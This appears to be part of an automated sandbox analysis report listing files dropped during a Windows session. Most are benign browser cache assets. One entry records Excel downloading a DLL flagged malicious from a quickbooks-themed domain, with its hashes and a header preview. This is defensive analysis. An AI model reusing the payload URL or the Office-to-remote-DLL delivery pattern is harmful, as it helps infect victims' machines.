                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ErrorPageTemplate[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):2168
                                                                                                                                                                Entropy (8bit):5.207912016937144
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:5+j5xU5k5N0ndgvoyeP0yyiyQCDr3nowMVworDtX3orKxWxDnCMA0da+hieyuSQK:5Q5K5k5pvFehWrrarrZIrHd3FIQfOS6
                                                                                                                                                                MD5:F4FE1CB77E758E1BA56B8A8EC20417C5
                                                                                                                                                                SHA1:F4EDA06901EDB98633A686B11D02F4925F827BF0
                                                                                                                                                                SHA-256:8D018639281B33DA8EB3CE0B21D11E1D414E59024C3689F92BE8904EB5779B5F
                                                                                                                                                                SHA-512:62514AB345B6648C5442200A8E9530DFB88A0355E262069E0A694289C39A4A1C06C6143E5961074BFAC219949102A416C09733F24E8468984B96843DC222B436
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/ErrorPageTemplate.css
                                                                                                                                                                Preview: .body..{...font-family: "Segoe UI", "verdana", "arial";...background-image: url(background_gradient.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;...color: #575757;..}....body.securityError..{...font-family: "Segoe UI", "verdana" , "Arial";...background-image: url(background_gradient_red.jpg);...background-repeat: repeat-x;...background-color: #E8EAEF;...margin-top: 20px;...margin-left: 20px;..}....body.tabInfo..{...background-image: none;...background-color: #F4F4F4;..}.. ..a..{...color: rgb(19,112,171);.font-size: 1em;...font-weight: normal;...text-decoration: none;...margin-left: 0px;...vertical-align: top;..}....a:link, a:visited..{...color: rgb(19,112,171);...text-decoration: none;...vertical-align: top;..}....a:hover..{...color: rgb(7,74,229);...text-decoration: underline;..}....p..{...font-size: 0.9em;..}.....h1 /* used for Title */..{...color: #4465A2;...font-size: 1.1em;...font-weight: normal;...vertical-align
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\background_gradient[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 1x800, frames 3
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):453
                                                                                                                                                                Entropy (8bit):5.019973044227213
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:3llVuiPjlXJYhg5suRd8PImMo23C/kHrJ8yA/NIeYoWg78C/vTFvbKLAh3:V/XPYhiPRd8j7+9LoIrobtHTdbKi
                                                                                                                                                                MD5:20F0110ED5E4E0D5384A496E4880139B
                                                                                                                                                                SHA1:51F5FC61D8BF19100DF0F8AADAA57FCD9C086255
                                                                                                                                                                SHA-256:1471693BE91E53C2640FE7BAEECBC624530B088444222D93F2815DFCE1865D5B
                                                                                                                                                                SHA-512:5F52C117E346111D99D3B642926139178A80B9EC03147C00E27F07AAB47FE38E9319FE983444F3E0E36DEF1E86DD7C56C25E44B14EFDC3F13B45EDEDA064DB5A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ......JFIF.....d.d......Ducky.......P......Adobe.d................................................................................................................................................. ...............W..............................................................Qa.................................?......%.....x......s...Z.......j.T.wz.6...X.@... V.3tM...P@.u.%...m..D.25...T...F.........p......A..........BP..qD.(.........ntH.@......h?..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\bullet[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):447
                                                                                                                                                                Entropy (8bit):7.304718288205936
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/71Cyt/JNTWxGdr+kZDWO7+4dKIv0b1GKuxu+R:/yBJNTqsSk9BTwE05su+R
                                                                                                                                                                MD5:26F971D87CA00E23BD2D064524AEF838
                                                                                                                                                                SHA1:7440BEFF2F4F8FABC9315608A13BF26CABAD27D9
                                                                                                                                                                SHA-256:1D8E5FD3C1FD384C0A7507E7283C7FE8F65015E521B84569132A7EABEDC9D41D
                                                                                                                                                                SHA-512:C62EB51BE301BB96C80539D66A73CD17CA2021D5D816233853A37DB72E04050271E581CC99652F3D8469B390003CA6C62DAD2A9D57164C620B7777AE99AA1B15
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE...(EkFRp&@e&@e)Af)AgANjBNjDNjDNj2Vv-Xz-Y{3XyC\}E_.2j.3l.8p.7q.;j.;l.Zj.\l.5o.7q.<..aw.<..dz.E...........1..@.7..~.....9..:.....A..B..E..9..:..a..c..b..g.#M.%O.#r.#s.%y.2..4..+..-..?..@..;..p..s...G..H..M.........z`....#tRNS................................../,....mIDATx^..C..`.......S....y'...05...|..k.X......*`.F.K....JQ..u.<.}.. ..[U..m....'r%.......yn.`.7F..).5..b..rX.T.....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\down[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 15 x 15, 8-bit colormap, non-interlaced
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):748
                                                                                                                                                                Entropy (8bit):7.249606135668305
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:6v/7/2QeZ7HVJ6o6yiq1p4tSQfAVFcm6R2HkZuU4fB4CsY4NJlrvMezoW2uONroc:GeZ6oLiqkbDuU4fqzTrvMeBBlE
                                                                                                                                                                MD5:C4F558C4C8B56858F15C09037CD6625A
                                                                                                                                                                SHA1:EE497CC061D6A7A59BB66DEFEA65F9A8145BA240
                                                                                                                                                                SHA-256:39E7DE847C9F731EAA72338AD9053217B957859DE27B50B6474EC42971530781
                                                                                                                                                                SHA-512:D60353D3FBEA2992D96795BA30B20727B022B9164B2094B922921D33CA7CE1634713693AC191F8F5708954544F7648F4840BCD5B62CB6A032EF292A8B0E52A44
                                                                                                                                                                Malicious:false
                                                                                                                                                                IE Cache URL:res://ieframe.dll/down.png
                                                                                                                                                                Preview: .PNG........IHDR...............ex....PLTE....W..W..W..W..W..W..W..W..W..W..W..W..W.U..............W..W.!Y.#Z.$\.'].<r.=s.P..Q..Q..U..o..p..r..x..z..~.............................................b.............................................................................................................................................................................................................$..s...7tRNS.a.o(,.s....e......q*...................................F.Z....IDATx^%.S..@.C..jm.mTk...m.?|;.y..S....F.t...,.......D.>..LpX=f.M...H4........=...=..xy.[h..7....7.....<.q.kH....#+....I..z.....'.ksC...X<.+..J>....%3BmqaV...h..Z._.:<.Y_jG...vN^.<>.Nu.u@.....M....?...1D.m~)s8..&....IEND.B`.
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\httpErrorPagesScripts[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12105
                                                                                                                                                                Entropy (8bit):5.451485481468043
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                                                                                                                                MD5:9234071287E637F85D721463C488704C
                                                                                                                                                                SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                                                                                                                                SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                                                                                                                                SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6495
                                                                                                                                                                Entropy (8bit):3.8998802417135856
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                                                MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                                                SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                                                SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                                                SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):4113
                                                                                                                                                                Entropy (8bit):7.9370830126943375
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                                                MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                                                SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                                                SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                                                SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dll
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                Category:downloaded
                                                                                                                                                                Size (bytes):886272
                                                                                                                                                                Entropy (8bit):5.674513513570937
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24576:Ydk22FB2tfgklpVM5HdBcvLrXmF63WaSc:YdkDT29zaVg3WaSc
                                                                                                                                                                MD5:5BA7AC7FA4F9E831679832B6CC22AEE8
                                                                                                                                                                SHA1:813DF24AC22C2666B28BC3E7FB9BD1EEF2A7F395
                                                                                                                                                                SHA-256:D2C19AC3EACE29239BF919C442556ABF782DA5953325EE6B2626482FBF442F29
                                                                                                                                                                SHA-512:A345B0749D5745640FD7908CDB142960DA22AC6029BAFDDC0666D11EB5033756C3CFDE84D2FB94DCBF418DF40D2CE49EC4A18B919714402B7045B96E619A27CD
                                                                                                                                                                Malicious:true
                                                                                                                                                                Antivirus:
                                                                                                                                                                 • Antivirus: Metadefender, Detection: 6%
                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                IE Cache URL:https://quickbooks.aeymotors.com/soft.dll
                                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~];V:<U.:<U.:<U....><U....;<U.7n..<<U.7n..+<U.7n..+<U.7n..,<U....1<U.:<T.c=U.7n...<U.7n..;<U.7n..;<U.7n..;<U.Rich:<U.........................PE..L....5.S...........!.....0...................@............................................@......................... >..[.......P................................'..P...8...............................@............................................text...{........0.................. ..`.data...,x...@.......4..............@....idata...............J..............@..@.rsrc................X..............@..@.reloc...'.......(...^..............@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\75810000
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):739934
                                                                                                                                                                Entropy (8bit):7.613757667716916
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:sRRb8XfJ2p7+wxj7QxYw8dKsWaqw+DfTtRdJyQzmiFx7llWA6zOLn1:sPD7Qy5WtFyinFxhlWAAOL1
                                                                                                                                                                MD5:919C71524C4AD38E68485B8EF18FFCFB
                                                                                                                                                                SHA1:84E886A19E5BAE94174EFCB36781BAE27F908606
                                                                                                                                                                SHA-256:00AA76BB22C8780C743BE7A458C145026EBF8F9BEE5264397575EF8A82BA3589
                                                                                                                                                                SHA-512:69D7BEB6A5271AB05F23AF87235C9655F9D3F0C24B301137C392D616E3278B9B8227E3E64F2578728E65AEF26AFEF52AB91124D6B01A4327DC864E0A64C2120D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .T.n.0....?..........C....I?`M.%.|..$..w);n..V.....;3;...f.l...L.jf.B..6.k.....QQ......."......6"U...}...zt@M..9...A.....j......T.g....C,..q.O6W..^.)Y./.o.}.....5.2...^.!..je...C7.....1;..d.1=`.\..y.3....qEsY?....4.{....J..D.d.N0..i..y?....X.C.w..-...%..2.us.....B...5.T.....9..*<.4..RI...)...GhJASY.......DG.k.rx........B.[...O.T...c.!.~..@....7.....H.......:....>.H<..Nw...Kv...S6x..c.t`.i....2N5.#.r..........PK..........!..j0.............[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................M
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                                Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):89
                                                                                                                                                                Entropy (8bit):4.2887395101637535
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:oVXUbUvLJXUERAW8JOGXnEbUvLJXp7n:o9UwTJXUER9qEwTJXB
                                                                                                                                                                MD5:622796DA58F76A7D579E6ACB8805C986
                                                                                                                                                                SHA1:EF5F7DDAC8FFD14F554A59272ED31AFC9CF7A4B9
                                                                                                                                                                SHA-256:04FA0E5F8C76B043A09C80EA6E59DE6666DBBDDC0A0E22E4441993DE40DF7A18
                                                                                                                                                                SHA-512:A3AD28FF335B44AD90C01832347E001536FFB2F941EAB637C4DA81CBB0922BDFE8A3F5594544532A32B4A600C51964C63B06F7E0631EFE61206D7D45A96DC059
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: [2021/06/11 05:09:05.152] Latest deploy version: ..[2021/06/11 05:09:05.152] 11.211.2 ..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0BD071FBB4571C26.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4086481813194674
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lobF9loh9lWUi2Xw:kBqoIq0Ui2Xw
                                                                                                                                                                MD5:5776EA1EA24C4EF818C9B1F7930236FA
                                                                                                                                                                SHA1:6D6199A413F9643D95C6622E8384E92693BF6AE2
                                                                                                                                                                SHA-256:C58D4EF803F942EF52E6E5007470AF7A00F02DCF57113D59BA9CF2B569D1DB1D
                                                                                                                                                                SHA-512:73A9DCBE5E1BBCD7744929EDECDBC9CE612A0172E2E8FB51238D3224629388B39D2823D67E18C1A0B94662A7F3959D513BE3376D57763B4F0BADB635C409B4D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF0C381C9F25162F0F.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40966523041045205
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loYF9log9lWPZtZh:kBqoIrNBrh
                                                                                                                                                                MD5:8264579992805C3C669E9A52F23D0627
                                                                                                                                                                SHA1:D719FF0E06F5CA8461846BF5F9F30D815A163EFE
                                                                                                                                                                SHA-256:AFC54D813AF0ED5332197B49EB76AD0CCEDE6EB98DDAD093932671343776DE28
                                                                                                                                                                SHA-512:94C880FF9959FA655C2A2E617163ECBD4DBB3C89FCFA9B9C703998CE353492C3C9924771A38B15FB707E00073749EF7241A7A0765E4B3CC3BD2F94522E041C68
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF4271FDBD8E9E22F1.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.4125154592058443
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9lomF9loK9lW8O3xj:kBqoIFz8+xj
                                                                                                                                                                MD5:4E1A34E11231735937ADCC05BB6858EB
                                                                                                                                                                SHA1:E87786FDE08C67CC84D7AF2434502A34ACC7244E
                                                                                                                                                                SHA-256:D1B6043A270856EE210590096D3E81E9917E031F4CC69983C6A846C26DC011FE
                                                                                                                                                                SHA-512:4FD191751847EB0E43BD9D52A63DB0657E5F6AC7FA337481AB82D570464221F65D91C5CA3FAEC721E156E52267ED57F80CEA5FC2F188064CC5D78869AEE1D92C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF49A83EA77EEC1211.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):12933
                                                                                                                                                                Entropy (8bit):0.40990396631859316
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:c9lLh9lLh9lIn9lIn9loBsF9loBM9lWBx+9nLc:kBqoIBHBhBxEnLc
                                                                                                                                                                MD5:FC793D4F4F3DCC6D4B982980F49EBB0E
                                                                                                                                                                SHA1:F496C78BBFA85FFFDB361A425A5D9BFF098A4ACD
                                                                                                                                                                SHA-256:374E1C33805069F54CBFFBE5CD199555AAE8B1A220BEE4BA0B0A8A9433CDEA68
                                                                                                                                                                SHA-512:0048AC3407C53750A20F1EA840BECB4668602482A4B28CABFAD00B8E76C3F657C0E7EFFC23245DC12566C8BB5F8A9BDC0D33137A1E242B9041A3D0D18992DE2B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF60CBFC830128400E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40081
                                                                                                                                                                Entropy (8bit):0.6597804907804279
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+RP98fGc4UO/c4UOkc4UOx:kBqoxKAuqR+RP98fGcRO/cROkcROx
                                                                                                                                                                MD5:B41F07FE6AE34A2E20BB3E605299AFFB
                                                                                                                                                                SHA1:6F013EB3C0303609524F4C862F84A80A98C512A0
                                                                                                                                                                SHA-256:962EBFAE0C52F8995B951AEDE9B2B29C33BC646FDE6FFE6BD15E77F0F23BC08A
                                                                                                                                                                SHA-512:023EF050E473B6E022CC786306266F7D1EA5DE0C627626D63050CBD8F36567FA9C6DA3D02F76E30FBF342C4D2071707D4EEDCB7E1C6184412501B0CFC0393830
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DF7C4D49990777E39E.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40049
                                                                                                                                                                Entropy (8bit):0.6534455629681263
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:kBqoxKAuvScS+vRT6h/Ug3DTDp7wUg3DTDp7zsg3DTDp79:kBqoxKAuqR+vRT6hMYzp7bYzp7QYzp79
                                                                                                                                                                MD5:A23E8DE3CD5D37D5F466898CE93B03B7
                                                                                                                                                                SHA1:B298765648C97CF0E69C77A6C23FF41B6EDE5EBA
                                                                                                                                                                SHA-256:65EBB07367E1FBB0F6D1E5CB45AB9E3AD7614D010F8C9093FDA3AE56D76659B3
                                                                                                                                                                SHA-512:F8E53D6711A7846730825F7C890DC43EA3D3F1B1970381C2C3A87418A040C178C37E117D2A1DDBDD335D9B6CA39F2320BB7E319CF5C2E612C8E17D0F9F77333F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\~DFC22BD3D12F5E2F3B.TMP
                                                                                                                                                                Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):40161
                                                                                                                                                                Entropy (8bit):0.6743315250600196
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:kBqoxKAuqR+npLCJ8ApcHX/ApcHXMApcHXJ:kBqoxKAuqR+npLCJ8nHvnH8nHZ
                                                                                                                                                                MD5:4295C4E20D4FB214EDF426348DB52151
